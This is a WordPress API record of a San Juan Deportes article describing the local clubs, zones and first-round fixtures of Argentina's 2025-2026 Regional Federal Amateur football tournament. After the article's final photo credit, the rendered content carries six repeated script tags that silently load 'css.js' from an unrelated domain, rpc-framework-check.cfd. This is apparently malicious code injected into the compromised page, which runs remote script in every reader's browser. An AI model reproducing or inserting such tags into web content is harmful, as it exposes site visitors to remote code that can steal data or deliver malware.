{"id":23940,"date":"2025-10-16T12:48:31","date_gmt":"2025-10-16T15:48:31","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=23940"},"modified":"2026-02-02T18:50:40","modified_gmt":"2026-02-02T21:50:40","slug":"en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur","status":"publish","type":"post","link":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/","title":{"rendered":"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">La octava edici\u00f3n de la cuarta categor\u00eda del f\u00fatbol argentino comenzar\u00e1 el fin de semana del s\u00e1bado 18 y domingo 19 de octubre.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Once clubes representar\u00e1n a San Juan en el Torneo Regional Federal Amateur 2025-2026, que comenzar\u00e1 el fin de semana del s\u00e1bado 18 y domingo 19 de octubre 2025. La octava edici\u00f3n de la cuarta categor\u00eda del f\u00fatbol argentino (clubes indirectamente afiliados a AFA) contar\u00e1 con la participaci\u00f3n de 330 equipos de todo el pa\u00eds. El premio final ser\u00e1n cuatro ascensos al Torneo Federal A 2026.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Las instituciones sanjuaninas son Club Paso de los Andes, de Albard\u00f3n; Club \u00c1rbol Verde, de J\u00e1chal; Club Atl\u00e9tico General Sarmiento, de Media Agua, Sarmiento; Club Atl\u00e9tico General Belgrano, de Media Agua, Sarmiento; Club Atl\u00e9tico Uni\u00f3n, de Villa Krause, Rawson; Club Atl\u00e9tico Marquesado, de Rivadavia; Club Atenas, de Pocito; Club Sportivo Desamparados, de Capital; Club Atl\u00e9tico Col\u00f3n Junior, de Capital; Club Atl\u00e9tico de la Juventud Alianza, de Santa Luc\u00eda; y Club Atl\u00e9tico Pe\u00f1aflor, de Villa Don Bosco, San Mart\u00edn.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Las zonas y la programaci\u00f3n de la primera fecha para las instituciones de San Juan son las siguientes:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Regi\u00f3n Cuyo<br>Zona 8: Paso de los Andes, \u00c1rbol Verde, General Sarmiento y General Belgrano.<br>Zona 9: Uni\u00f3n de Villa Krause, Atenas y Marquesado.<br>Zona 10: Sportivo Desamparados, Alianza, Col\u00f3n Junior y Pe\u00f1aflor.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">S\u00e1bado 18 octubre<br>17 horas: Pe\u00f1aflor vs. Alianza.<br>\u00c1rbitro: Jorge Albanesi. Estadio: Augusto Pulenta.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Domingo 19 octubre<br>16 horas: General Sarmiento vs. General Belgrano.<br>\u00c1rbitro: Cristian Caporale. Estadio: Gral. Sarmiento.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">16:45 horas: Paso de los Andes vs. \u00c1rbol Verde.<br>\u00c1rbitro: Sebasti\u00e1n Castro. Estadio: Polideportivo de Albard\u00f3n.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">19 horas: Uni\u00f3n VK vs. Atenas.<br>\u00c1rbitro: Enzo G\u00f3mez. Estadio: 12 de Octubre.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">20:30 horas: Desamparados vs. Col\u00f3n Junior.<br>\u00c1rbitro: Rub\u00e9n Fern\u00e1ndez. Estadio: Jos\u00e9 Eduardo Nehin.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Libre: Marquesado.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La segunda fecha se disputar\u00e1 el fin de semana del s\u00e1bado 01 y domingo 02 de noviembre 2025; la tercera entre el s\u00e1bado 08 y domingo 09; la cuarta entre el s\u00e1bado 15 y domingo 16; la quinta entre el s\u00e1bado 22 y domingo 23; la sexta y \u00faltima fecha entre el s\u00e1bado 29 y domingo 30.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El certamen distribuye a los clubes participantes en ocho regiones seg\u00fan ubicaci\u00f3n geogr\u00e1fica: Patag\u00f3nica (Neuqu\u00e9n, Chubut, R\u00edo Negro, Santa Cruz, Tierra del Fuego e Islas Malvinas); Pampeana Sur (La Pampa y Buenos Aires Centro-Sur); Pampeana Norte (Buenos Aires Norte); Litoral Sur (Santa Fe y Entre R\u00edos); Litoral Norte (Corrientes, Misiones, Chaco y Formosa); Norte (Jujuy, Salta y Tucum\u00e1n); Centro (Catamarca, La Rioja, Santiago del Estero y C\u00f3rdoba); y Cuyo (San Juan, Mendoza y San Luis). Esta vez habr\u00e1 36 conjuntos cuyanos, 15 mendocinos, 11 sanjuaninos y 10 puntanos.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Dentro de cada Regi\u00f3n hay grupos de tres, cuatro y hasta de cinco equipos. La primera ronda se disputa a dos vueltas (ida y vuelta), bajo el sistema de todos contra todos. La cantidad de equipos clasificados a las rondas eliminatorias es variada. En la temporada pasada, el primero de cada zona clasific\u00f3 directo, y un cierto cupo de los mejores segundos de zona tambi\u00e9n avanz\u00f3.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Las series eliminatorias van disput\u00e1ndose hasta el momento de las finales. Cada Regi\u00f3n contar\u00e1 con un equipo que jugar\u00e1 el partido definitorio, a final \u00fanica en sede neutral, a designar por el Consejo Federal de AFA, ente organizador del Regional Amateur. En la \u00faltima edici\u00f3n, el club ganador de Cuyo (Sportivo Desamparados de San Juan) enfrent\u00f3 a su par de Litoral Sur (Ben Hur de Rafaela); el de Centro (Acci\u00f3n Juvenil de General Deheza, C\u00f3rdoba) al de Litoral Norte (Bartolom\u00e9 Mitre de Posadas, Misiones); el de Patag\u00f3nica (Comisi\u00f3n de Actividades Infantiles de Comodoro Rivadavia) ante Pampeana Sur (Costa Brava de General Pico, La Pampa); y Norte (Deportivo Graneros de Tucum\u00e1n) vs. Pampeana Norte (Gimnasia y Esgrima de Chivilcoy, Buenos Aires). Estimativamente, el nuevo campeonato concluir\u00e1 en febrero 2026. Los cuatro clubes campeones formar\u00e1n parte del Federal A 2026, tercera categor\u00eda nacional, que iniciar\u00e1 entre marzo y abril.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Fotograf\u00eda: Uni\u00f3n de Villa Krause, ganador del Torneo Apertura 2025 de Primera Divisi\u00f3n, es el vigente campe\u00f3n del f\u00fatbol sanjuanino y ser\u00e1 uno de los once participantes del Regional Amateur. Cr\u00e9ditos: Prensa Liga Sanjuanina de F\u00fatbol.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>La octava edici\u00f3n de la cuarta categor\u00eda del f\u00fatbol argentino comenzar\u00e1 el fin de semana del s\u00e1bado 18 y domingo 19 de octubre. Once clubes representar\u00e1n a San Juan en el Torneo Regional Federal Amateur 2025-2026, que comenzar\u00e1 el fin de semana del s\u00e1bado 18 y domingo 19 de octubre 2025. La octava edici\u00f3n de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":15082,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[182,178],"tags":[],"class_list":["post-23940","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-regional-amateur","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"La octava edici\u00f3n de la cuarta categor\u00eda del f\u00fatbol argentino comenzar\u00e1 el fin de semana del s\u00e1bado 18 y domingo 19 de octubre. Once clubes representar\u00e1n a San Juan en el Torneo Regional Federal Amateur 2025-2026, que comenzar\u00e1 el fin de semana del s\u00e1bado 18 y domingo 19 de octubre 2025. La octava edici\u00f3n de [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-16T15:48:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T21:50:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2022\/02\/273505998_427354275853813_3299593466417208413_n.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1027\" \/>\n\t<meta property=\"og:image:height\" content=\"824\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur\",\"datePublished\":\"2025-10-16T15:48:31+00:00\",\"dateModified\":\"2026-02-02T21:50:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/\"},\"wordCount\":732,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2022\\\/02\\\/273505998_427354275853813_3299593466417208413_n.jpg\",\"articleSection\":[\"Regional Amateur\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/\",\"name\":\"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur - San Juan Deportes\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2022\\\/02\\\/273505998_427354275853813_3299593466417208413_n.jpg\",\"datePublished\":\"2025-10-16T15:48:31+00:00\",\"dateModified\":\"2026-02-02T21:50:40+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/#primaryimage\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2022\\\/02\\\/273505998_427354275853813_3299593466417208413_n.jpg\",\"contentUrl\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2022\\\/02\\\/273505998_427354275853813_3299593466417208413_n.jpg\",\"width\":1027,\"height\":824},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/10\\\/16\\\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/","og_locale":"es_ES","og_type":"article","og_title":"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur - San Juan Deportes","og_description":"La octava edici\u00f3n de la cuarta categor\u00eda del f\u00fatbol argentino comenzar\u00e1 el fin de semana del s\u00e1bado 18 y domingo 19 de octubre. Once clubes representar\u00e1n a San Juan en el Torneo Regional Federal Amateur 2025-2026, que comenzar\u00e1 el fin de semana del s\u00e1bado 18 y domingo 19 de octubre 2025. La octava edici\u00f3n de [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-10-16T15:48:31+00:00","article_modified_time":"2026-02-02T21:50:40+00:00","og_image":[{"width":1027,"height":824,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2022\/02\/273505998_427354275853813_3299593466417208413_n.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/"},"author":{"name":"admin","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur","datePublished":"2025-10-16T15:48:31+00:00","dateModified":"2026-02-02T21:50:40+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/"},"wordCount":732,"commentCount":0,"publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2022\/02\/273505998_427354275853813_3299593466417208413_n.jpg","articleSection":["Regional Amateur","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/","name":"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur - San Juan Deportes","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2022\/02\/273505998_427354275853813_3299593466417208413_n.jpg","datePublished":"2025-10-16T15:48:31+00:00","dateModified":"2026-02-02T21:50:40+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/#primaryimage","url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2022\/02\/273505998_427354275853813_3299593466417208413_n.jpg","contentUrl":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2022\/02\/273505998_427354275853813_3299593466417208413_n.jpg","width":1027,"height":824},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/10\/16\/en-detalles-asi-jugaran-los-equipos-sanjuaninos-el-regional-amateur\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"En detalles: as\u00ed jugar\u00e1n los equipos sanjuaninos el Regional Amateur"}]},{"@type":"WebSite","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website","url":"http:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"http:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"http:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23940","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=23940"}],"version-history":[{"count":7,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23940\/revisions"}],"predecessor-version":[{"id":28540,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23940\/revisions\/28540"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/15082"}],"wp:attachment":[{"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=23940"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=23940"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=23940"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}